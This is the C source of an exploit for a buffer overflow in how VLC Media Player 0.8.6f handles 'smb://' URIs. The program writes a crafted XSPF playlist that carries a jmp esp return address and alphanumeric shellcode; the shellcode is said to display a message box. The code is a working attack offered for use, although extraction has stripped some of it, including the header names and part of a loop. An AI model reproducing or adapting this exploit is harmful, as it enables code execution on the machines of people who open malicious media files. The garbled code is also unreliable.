/* VLC Media Player 'smb://' URI Handling Remote Buffer Overflow Vulnerability Exploit * Reference: http://www.securityfocus.com/bid/35500 * * Tested on VLC media player 0.8.6f on WinXP SP3 * * Coded by Pankaj Kohli * http://www.pank4j.com * */ #include #include // ASCII shellcode (Display a message box & exit) unsigned char shell[] = "TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkOjpJHIvKOYokObPPwRN1uqt5PA"; long jmp = 0x7E485233; // jmp esp (user32.dll) int main(int argc, char **argv) { char buff[512], *p; FILE *fp; int i; long *ptr; fp = fopen("sploit.xspf", "wb"); fprintf(fp, "\n"); fprintf(fp, "\n"); fprintf(fp, "\tPlaylist\n"); fprintf(fp, "\t\n"); fprintf(fp, "\t\t\n"); fprintf(fp, "\t\t\tsmb://example.com@www.example.com/foo/#{"); printf("[*] Creating buffer\n"); for(i=0; i<300; i++) { buff[i] = 'a' + ((i/4)%26); } ptr = (long *) (buff + 96); *ptr = jmp; for(i=0; i\n"); fprintf(fp, "\t\t\t\n"); fprintf(fp, "\t\t\t\t0\n"); fprintf(fp, "\t\t\t\n"); fprintf(fp, "\t\t\n"); fprintf(fp, "\t\n"); fprintf(fp, "\n"); fclose(fp); printf("[*] Exploit file written to sploit.xspf\n"); return 0; }